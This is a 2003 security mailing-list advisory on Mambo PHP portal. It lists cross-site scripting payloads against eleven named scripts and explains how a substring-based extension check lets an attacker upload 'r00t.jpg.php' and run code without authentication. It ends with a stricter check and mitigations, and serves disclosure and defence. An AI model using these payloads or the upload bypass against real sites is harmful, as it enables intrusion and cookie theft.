[UNIX] Mambo PHP-Portal Vulnerability (XSS and Command Execution)

From: support@securiteam.com
Date: 01/12/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 12 Jan 2003 18:26:21 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Beyond Security would like to welcome Tiscali World Online
    to our service provider team.
    For more info on their service offering IP-Secure,
    please visit http://www.worldonline.co.za/services/work_ip.asp
    - - - - - - - - -

      Mambo PHP-Portal Vulnerability (XSS and Command Execution)
    ------------------------------------------------------------------------

    SUMMARY

    Mambo Site Server (http://www.mamboserver.com/) is a website portal tool
    written in PHP. Several vulnerabilities have been discovered in it, including
    cross-site scripting (XSS) and remote code execution on the server with the
    web server's permissions. Several include and upload scripts do not check for
    admin access or apply any other restriction, and so allow attackers to run
    arbitrary code without authorization.

    DETAILS

    Vulnerable systems:
     * Mambo PHP Portal version 4.0.12 BETA and prior

    Cross Site Scripting:
    XSS exists in the following files, and possibly in a few more:
     * administrator/popups/sectionswindow.php (type=web&link="< script>alert(document.cookie)</script>)
     * administrator/gallery/gallery.php (directory="< script>alert(document.cookie)</script>)
     * administrator/gallery/navigation.php (directory="< script>alert(document.cookie)</script>)
     * administrator/gallery/uploadimage.php (directory="< script>alert(document.cookie)</script>)
     * administrator/gallery/view.php (path="< script>alert(document.cookie)</script>)
     * administrator/upload.php (newbanner=1&choice="< script>alert(document.cookie)</script>)
     * themes/mambosimple.php (detection=detected&sitename=</title>< script>alert(document.cookie)</script>)
     * upload.php (type="< script>alert(document.cookie)</script>)
     * emailfriend/emailarticle.php (id="< script>alert(document.cookie)</script>)
     * emailfriend/emailfaq.php (id="< script>alert(document.cookie)</script>)
     * emailfriend/emailnews.php (id="< script>alert(document.cookie)</script>)

    Remote Arbitrary Code Execution
    A remote command execution vulnerability was found in the gallery image
    upload utility under the administrator directory.

    administrator/gallery/uploadimage.php

    (These are also exploitable: upload.php and administrator/upload.php)

    Apparently, this file allows any remote or local user to upload 'images'
    to the server without checking any permission settings. By bypassing the
    badly written file-extension check, an attacker can upload arbitrary files
    of any type to the server.

    Exploit:
    The following code can be found inside the uploadimage.php file.
    .
    if (isset($fileupload)){
        if ($directory!="uploadfiles"){
            $base_Dir = "../../images/stories/";
        }else{
            $base_Dir = "../../uploadfiles/$Itemid/";
        }

        $filename = split("\.", $userfile_name);
        if (eregi("[^0-9a-zA-Z_]", $filename[0])){
            print "<SCRIPT> alert('File must only contain alphanumeric characters and no spaces please.'); window.history.go(-1);</SCRIPT>\n";
            exit();
        }

        if (file_exists($base_Dir.$userfile_name)){
            print "<SCRIPT> alert('Image $userfile_name already exists.'); window.history.go(-1);</SCRIPT>\n";
            exit();
        }

        if ((!eregi(".gif", $userfile_name)) && (!eregi(".png", $userfile_name))
            && (!eregi(".jpg", $userfile_name)) && (!eregi(".doc", $userfile_name))
            && (!eregi(".xls", $userfile_name)) && (!eregi(".swf", $userfile_name))
            && (!eregi(".pdf", $userfile_name))){
            print "<SCRIPT>alert('The file must be pdf, gif, png, jpg, doc, xls or swf'); window.history.go(-1);</SCRIPT>\n";
            exit();
        }

        if ((eregi(".pdf", $userfile_name)) || (eregi(".doc", $userfile_name)) ||
            (eregi(".xls", $userfile_name))){
            if (!copy($userfile, $pdf_path.$userfile_name)){
                echo "Failed to copy $userfile_name";
            }
        }
        elseif (!copy($userfile, $base_Dir.$userfile_name)){
            echo "Failed to copy $userfile_name";
        }

        if (eregi(".jpg", $userfile_name)){
            print "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&image=jpg&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
        }
        elseif (eregi(".pdf", $userfile_name)){
            print "<SCRIPT>top.window.images.document.location.href='pdf.php'</SCRIPT>\n";
        }
        if (eregi(".png", $userfile_name)){
            print "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&image=png&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
        }
        else {
            print "<SCRIPT>top.window.images.document.location.href=\"index.php?gal=0&image=gif&directory=$directory&Itemid=$Itemid\"</SCRIPT>\n";
        }
    }

    .

    First things first:

    if (isset($fileupload)){
        if ($directory!="uploadfiles"){
            $base_Dir = "../../images/stories/";
        }else{
            $base_Dir = "../../uploadfiles/$Itemid/";
        }

    This just sets the directory to which the files will be uploaded. We can
    leave both $directory and $fileupload empty.

    Now let's examine the 'security check' that is included in this code:
        if ((!eregi(".gif", $userfile_name)) && (!eregi(".png", $userfile_name))
            && (!eregi(".jpg", $userfile_name)) && (!eregi(".doc", $userfile_name))
            && (!eregi(".xls", $userfile_name)) && (!eregi(".swf", $userfile_name))
            && (!eregi(".pdf", $userfile_name))){

    As you can see, eregi() only checks whether '.ext' occurs somewhere inside
    the string $userfile_name; it does not check that the name ends with that
    extension. The attacker can simply rename his file to r00t.jpg.php and
    upload it without any warning.

    After uploading the arbitrary file successfully, the attacker only needs to
    trigger his code by requesting /images/stories/r00t.jpg.php, and he has
    remote access to the server with the web server's permissions.
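    As an added example (not the advisory's or Mambo's own code), the extension test above is rewritten beside a strict allow-list check and run over a few constructed file names; the eregi() pattern is expressed with preg_match, since eregi() was removed in PHP 7, and the sample names are made up for the demonstration.

```php
<?php
// Added example (not Mambo's code): the advisory's extension test beside a
// strict replacement, run over constructed file names.

// Mirrors the advisory's eregi(".jpg", ...) test: case-insensitive substring
// match, and the unescaped "." matches any single character.
function weak_extension_check(string $name): bool
{
    foreach (['gif', 'png', 'jpg', 'doc', 'xls', 'swf', 'pdf'] as $ext) {
        if (preg_match('/.' . $ext . '/i', $name)) {
            return true;
        }
    }
    return false;
}

// Strict replacement: exactly one dot, a basename of [0-9A-Za-z_] only, and
// the final extension looked up in an allow-list after lower-casing it.
function strict_extension_check(string $name): bool
{
    $allowed = ['gif', 'png', 'jpg', 'doc', 'xls', 'swf', 'pdf'];
    if (!preg_match('/^[0-9A-Za-z_]+\.([0-9A-Za-z]+)$/', $name, $m)) {
        return false;
    }
    return in_array(strtolower($m[1]), $allowed, true);
}

// Constructed sample names: a real image, the advisory's double extension,
// a name that only matches because "." is a wildcard, and two case variants.
$samples = ['photo.jpg', 'r00t.jpg.php', 'xjpg', 'shell.PHP', 'report.PDF'];
foreach ($samples as $name) {
    printf("%-14s weak=%-6s strict=%s\n", $name,
        weak_extension_check($name) ? 'pass' : 'reject',
        strict_extension_check($name) ? 'pass' : 'reject');
}
```

    Even with the strict check in place, the upload directory should not be served with script execution enabled, so that a file which does slip through is returned as data rather than run.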

    Solution:
    Please check the vendor's website for new patches.

    Meanwhile, you should remove the following files from your server:
     * upload.php
     * administrator/upload.php
     * administrator/gallery/uploadimage.php

    ADDITIONAL INFORMATION

    The information has been provided by Mindwarper (mindwarper@hush.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
